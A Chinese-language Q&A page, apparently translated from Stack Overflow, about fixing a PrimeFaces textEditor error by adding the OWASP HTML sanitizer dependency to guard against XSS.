小贝子编程

文本编辑器组件被标记为 secure='true',但在类路径上找不到 HTML 清理器



错误消息:

TextEditor组件被标记为secure='true',但在类路径上找不到HTML Sanitizer。根据文档将HTML清理程序添加到类路径中,或者如果您希望使用不带清理程序的组件,则将secure='false'标记为。

这是我的pom.xml

<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0" 
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 
https://maven.apache.org/xsd/maven-4.0.0.xsd">
<modelVersion>4.0.0</modelVersion>

<groupId>com.jsf</groupId>
<artifactId>showcase</artifactId>
<version>1.0.0</version>
<packaging>war</packaging>

<name>showcase</name>
<url>http://maven.apache.org</url>

<repositories>
<repository>
<id>prime-repo</id>
<name>Prime Repo</name>
<url>http://repository.primefaces.org</url>
</repository>
</repositories>

<dependencies>
<dependency>
<groupId>org.primefaces</groupId>
<artifactId>primefaces</artifactId>
<version>8.0.RC3</version>
</dependency>
<dependency>
<groupId>org.jboss.weld.servlet</groupId>
<artifactId>weld-servlet-shaded</artifactId>
<version>3.1.3.Final</version>
</dependency>
<dependency>
<groupId>javax</groupId>
<artifactId>javaee-web-api</artifactId>
<version>8.0.1</version>
<scope>provided</scope>
</dependency>
<dependency>
<groupId>org.glassfish</groupId>
<artifactId>jakarta.faces</artifactId>
<version>2.3.14</version>
</dependency>
<dependency>
<groupId>jakarta.servlet.jsp.jstl</groupId>
<artifactId>jakarta.servlet.jsp.jstl-api</artifactId>
<version>1.2.7</version>
</dependency>
<dependency>
<groupId>org.projectlombok</groupId>
<artifactId>lombok</artifactId>
<version>1.18.10</version>
<scope>provided</scope>
</dependency>
<dependency>
<groupId>org.apache.poi</groupId>
<artifactId>poi</artifactId>
<version>4.1.1</version>
</dependency>
<dependency>
<groupId>org.apache.poi</groupId>
<artifactId>poi-ooxml</artifactId>
<version>4.1.1</version>
</dependency>
<dependency>
<groupId>com.lowagie</groupId>
<artifactId>itext</artifactId>
<version>2.1.7</version>
</dependency>
</dependencies>

<build>
<plugins>
<plugin>
<artifactId>maven-compiler-plugin</artifactId>
<version>3.8.1</version>
<configuration>
<encoding>UTF-8</encoding>
<source>1.8</source>
<target>1.8</target>
</configuration>
</plugin>
<plugin>
<artifactId>maven-war-plugin</artifactId>
<version>3.2.3</version>
<configuration>
<filteringDeploymentDescriptors>true</filteringDeploymentDescriptors>
</configuration>
</plugin>
</plugins>
</build>
</project>

text编辑器.xhtml:

<html   xmlns="http://www.w3.org/1999/xhtml"
xmlns:ui="http://java.sun.com/jsf/facelets"
xmlns:h="http://java.sun.com/jsf/html"
xmlns:f="http://java.sun.com/jsf/core"
xmlns:p="http://primefaces.org/ui">

<h:head>
<h:outputStylesheet name="primeicons/primeicons.css" library="primefaces"/>
</h:head>

<h:body>
<h:form>    
<h3 style="margin-top:0">Basic</h3>
<p:textEditor widgetVar="editor1" value="#{editorView.text}" height="300" style="margin-bottom:10px"/>

<p:commandButton value="Submit" update="display" oncomplete="PF('dlg').show()" icon="pi pi-save" />
<p:commandButton value="Clear" type="button" onclick="PF('editor1').clear();" icon="pi pi-times" />

<h3 class="first">Custom Toolbar</h3>
<p:textEditor widgetVar="editor2" value="#{editorView.text2}" height="300" style="margin-bottom:10px" placeholder="Enter your content">
<f:facet name="toolbar">
<span class="ql-formats">
<button class="ql-bold"></button>
<button class="ql-italic"></button>
<button class="ql-underline"></button>
<button class="ql-strike"></button>
</span>
<span class="ql-formats">
<select class="ql-font"></select>
<select class="ql-size"></select>
</span>
</f:facet>
</p:textEditor>

<p:commandButton value="Submit" update="display" oncomplete="PF('dlg').show()" icon="pi pi-save" />
<p:commandButton value="Clear" type="button" onclick="PF('editor2').clear();" icon="pi pi-times" />

<p:dialog header="Content" widgetVar="dlg" showEffect="fade" hideEffect="fade">
<p:outputPanel id="display">
<h3 style="margin-top:0">Basic</h3>
<h:outputText value="#{editorView.text}" escape="false" />

<h3>Custom</h3>
<h:outputText value="#{editorView.text2}" escape="false" />
</p:outputPanel>
</p:dialog>     
</h:form>
</h:body>
</html>

编辑器View.java

package com.jsf.showcase.view.input;
import javax.enterprise.context.RequestScoped;
import javax.inject.Named;
import lombok.Getter;
import lombok.Setter;
@Getter @Setter
@Named
@RequestScoped
public class EditorView {
private String text;
private String text2;
}

PrimeFaces版本:8

我已经解决了这个依赖关系。谢谢Kukeltje。

<dependency>
<groupId>com.googlecode.owasp-java-html-sanitizer</groupId>
<artifactId>owasp-java-html-sanitizer</artifactId>
<version>20191001.1</version>
</dependency>

与Mario的答案相关,该依赖关系目前不可用。我使用了以下依赖项,它也很好:

<dependency>
<groupId>com.googlecode.owasp-java-html-sanitizer</groupId>
<artifactId>html-types</artifactId>
<version>20200713.1</version>
</dependency>

根据文档,默认情况下,textEditor元素在true上具有secure属性。这是因为我们需要保护文本编辑器免受XSS攻击(您不希望攻击者在编辑器中编写恶意代码,然后可以在其他用户的浏览器中执行(

https://owasp.org/www-community/attacks/xss/

因此,为什么您不仅需要使用依赖owasp-java-html清理程序,还需要保持它的最新状态,以防出现漏洞。

https://search.maven.org/artifact/com.googlecode.owasp-java-html-sanitizer/owasp-java-html-sanitizer

相关内容

  • 没有找到相关文章

最新更新


热门标签:

javascript python java c# php android html jquery c++ css ios sql mysql arrays asp.net json python-3.x ruby-on-rails .net sql-server django objective-c excel regex ruby linux ajax iphone xml vba spring asp.net-mvc database wordpress string postgresql wpf windows xcode bash git oracle list vb.net multithreading eclipse algorithm macos powershell visual-studio image forms numpy scala function api selenium